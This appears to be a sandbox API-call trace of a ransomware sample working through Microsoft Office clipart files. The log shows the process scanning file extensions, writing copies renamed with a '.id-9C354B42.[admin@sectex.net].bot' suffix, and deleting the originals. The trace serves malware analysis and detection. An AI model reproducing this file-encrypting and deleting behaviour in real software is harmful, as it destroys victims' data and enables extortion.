	[0164.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0164.636] GetLastError () returned 0x0
	[0164.636] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2a80, lpOverlapped=0x0) returned 1
	[0164.654] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2a90, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2a90, lpOverlapped=0x0) returned 1
	[0164.655] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.655] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.655] SetEndOfFile (hFile=0x1b4) returned 1
	[0164.656] CloseHandle (hObject=0x1b4) returned 1
	[0164.656] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.656] SetEndOfFile (hFile=0x3a8) returned 1
	[0164.658] CloseHandle (hObject=0x3a8) returned 1
	[0164.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0165.765] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf")) returned 1
	[0165.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.891] lstrlenW (lpString=".doc") returned 4
	[0165.891] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0165.891] lstrlenW (lpString=".docx") returned 5
	[0165.891] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0165.891] lstrlenW (lpString=".pdf") returned 4
	[0165.891] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0165.891] lstrlenW (lpString=".xls") returned 4
	[0165.891] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0165.891] lstrlenW (lpString=".xlsx") returned 5
	[0165.891] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0165.891] lstrlenW (lpString=".ppt") returned 4
	[0165.891] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0165.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.891] lstrlenW (lpString=".zip") returned 4
	[0165.891] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0165.891] lstrlenW (lpString=".rar") returned 4
	[0165.891] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0165.891] lstrlenW (lpString=".bz2") returned 4
	[0165.891] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0165.891] lstrlenW (lpString=".7z") returned 3
	[0165.891] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0165.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.891] lstrlenW (lpString=".dbf") returned 4
	[0165.891] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0165.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.891] lstrlenW (lpString=".1cd") returned 4
	[0165.891] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0165.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.891] lstrlenW (lpString=".jpg") returned 4
	[0165.891] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0165.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.892] lstrlenW (lpString=".doc") returned 4
	[0165.892] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0165.892] lstrlenW (lpString=".docx") returned 5
	[0165.892] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0165.892] lstrlenW (lpString=".pdf") returned 4
	[0165.892] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0165.892] lstrlenW (lpString=".xls") returned 4
	[0165.892] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0165.892] lstrlenW (lpString=".xlsx") returned 5
	[0165.892] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0165.892] lstrlenW (lpString=".ppt") returned 4
	[0165.892] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0165.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.892] lstrlenW (lpString=".zip") returned 4
	[0165.892] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0165.892] lstrlenW (lpString=".rar") returned 4
	[0165.892] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0165.892] lstrlenW (lpString=".bz2") returned 4
	[0165.892] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0165.892] lstrlenW (lpString=".7z") returned 3
	[0165.892] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0165.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.892] lstrlenW (lpString=".dbf") returned 4
	[0165.892] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0165.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.892] lstrlenW (lpString=".1cd") returned 4
	[0165.892] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0165.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned 63
	[0165.892] lstrlenW (lpString=".jpg") returned 4
	[0165.892] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0165.893] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0165.893] lstrlenW (lpString="J0152590.WMF") returned 12
	[0165.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0165.909] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=10932) returned 1
	[0165.909] CloseHandle (hObject=0x3a8) returned 1
	[0165.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf")) returned 0x20
	[0165.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0165.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0165.910] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.910] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0165.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0168.576] GetLastError () returned 0x0
	[0168.576] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2ab4, lpOverlapped=0x0) returned 1
	[0168.599] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2ac0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2ac0, lpOverlapped=0x0) returned 1
	[0168.600] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.600] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.600] SetEndOfFile (hFile=0x388) returned 1
	[0168.600] CloseHandle (hObject=0x388) returned 1
	[0168.600] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.600] SetEndOfFile (hFile=0x3a8) returned 1
	[0168.603] CloseHandle (hObject=0x3a8) returned 1
	[0168.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.604] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152590.wmf")) returned 1
	[0168.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.604] lstrlenW (lpString=".doc") returned 4
	[0168.604] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.604] lstrlenW (lpString=".docx") returned 5
	[0168.604] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0168.604] lstrlenW (lpString=".pdf") returned 4
	[0168.604] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.604] lstrlenW (lpString=".xls") returned 4
	[0168.604] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.604] lstrlenW (lpString=".xlsx") returned 5
	[0168.605] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0168.605] lstrlenW (lpString=".ppt") returned 4
	[0168.605] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.605] lstrlenW (lpString=".zip") returned 4
	[0168.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.605] lstrlenW (lpString=".rar") returned 4
	[0168.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.605] lstrlenW (lpString=".bz2") returned 4
	[0168.605] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.605] lstrlenW (lpString=".7z") returned 3
	[0168.605] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.605] lstrlenW (lpString=".dbf") returned 4
	[0168.605] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.605] lstrlenW (lpString=".1cd") returned 4
	[0168.605] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.606] lstrlenW (lpString=".jpg") returned 4
	[0168.606] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.606] lstrlenW (lpString=".doc") returned 4
	[0168.606] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString=".docx") returned 5
	[0168.606] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0168.606] lstrlenW (lpString=".pdf") returned 4
	[0168.606] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString=".xls") returned 4
	[0168.606] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.606] lstrlenW (lpString=".xlsx") returned 5
	[0168.606] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0168.606] lstrlenW (lpString=".ppt") returned 4
	[0168.606] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.606] lstrlenW (lpString=".zip") returned 4
	[0168.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.606] lstrlenW (lpString=".rar") returned 4
	[0168.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString=".bz2") returned 4
	[0168.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString=".7z") returned 3
	[0168.606] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.606] lstrlenW (lpString=".dbf") returned 4
	[0168.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.606] lstrlenW (lpString=".1cd") returned 4
	[0168.606] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152590.WMF") returned 63
	[0168.606] lstrlenW (lpString=".jpg") returned 4
	[0168.607] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.607] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0168.607] lstrlenW (lpString="J0152606.WMF") returned 12
	[0168.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.629] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=16632) returned 1
	[0168.629] CloseHandle (hObject=0x3a4) returned 1
	[0168.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf")) returned 0x20
	[0168.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.665] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.665] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0168.666] GetLastError () returned 0x0
	[0168.666] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x40f8, lpOverlapped=0x0) returned 1
	[0168.695] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4100, lpOverlapped=0x0) returned 1
	[0168.696] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.696] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.696] SetEndOfFile (hFile=0x388) returned 1
	[0168.696] CloseHandle (hObject=0x388) returned 1
	[0168.696] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.696] SetEndOfFile (hFile=0x3a8) returned 1
	[0168.701] CloseHandle (hObject=0x3a8) returned 1
	[0168.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.719] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf")) returned 1
	[0168.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.720] lstrlenW (lpString=".doc") returned 4
	[0168.720] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.720] lstrlenW (lpString=".docx") returned 5
	[0168.720] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0168.720] lstrlenW (lpString=".pdf") returned 4
	[0168.720] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.720] lstrlenW (lpString=".xls") returned 4
	[0168.720] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.720] lstrlenW (lpString=".xlsx") returned 5
	[0168.720] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0168.720] lstrlenW (lpString=".ppt") returned 4
	[0168.720] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.720] lstrlenW (lpString=".zip") returned 4
	[0168.720] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.720] lstrlenW (lpString=".rar") returned 4
	[0168.720] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.720] lstrlenW (lpString=".bz2") returned 4
	[0168.720] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.720] lstrlenW (lpString=".7z") returned 3
	[0168.720] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.720] lstrlenW (lpString=".dbf") returned 4
	[0168.720] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.720] lstrlenW (lpString=".1cd") returned 4
	[0168.720] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.720] lstrlenW (lpString=".jpg") returned 4
	[0168.720] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.721] lstrlenW (lpString=".doc") returned 4
	[0168.721] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.721] lstrlenW (lpString=".docx") returned 5
	[0168.721] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0168.721] lstrlenW (lpString=".pdf") returned 4
	[0168.721] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.721] lstrlenW (lpString=".xls") returned 4
	[0168.721] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.721] lstrlenW (lpString=".xlsx") returned 5
	[0168.721] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0168.721] lstrlenW (lpString=".ppt") returned 4
	[0168.721] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.721] lstrlenW (lpString=".zip") returned 4
	[0168.721] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.721] lstrlenW (lpString=".rar") returned 4
	[0168.721] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.721] lstrlenW (lpString=".bz2") returned 4
	[0168.721] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.721] lstrlenW (lpString=".7z") returned 3
	[0168.721] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.721] lstrlenW (lpString=".dbf") returned 4
	[0168.721] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.721] lstrlenW (lpString=".1cd") returned 4
	[0168.721] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 63
	[0168.721] lstrlenW (lpString=".jpg") returned 4
	[0168.721] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.722] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0168.722] lstrlenW (lpString="J0152628.WMF") returned 12
	[0168.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0168.722] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=30812) returned 1
	[0168.722] CloseHandle (hObject=0x3ac) returned 1
	[0168.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf")) returned 0x20
	[0168.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0168.723] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.723] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0168.723] GetLastError () returned 0x0
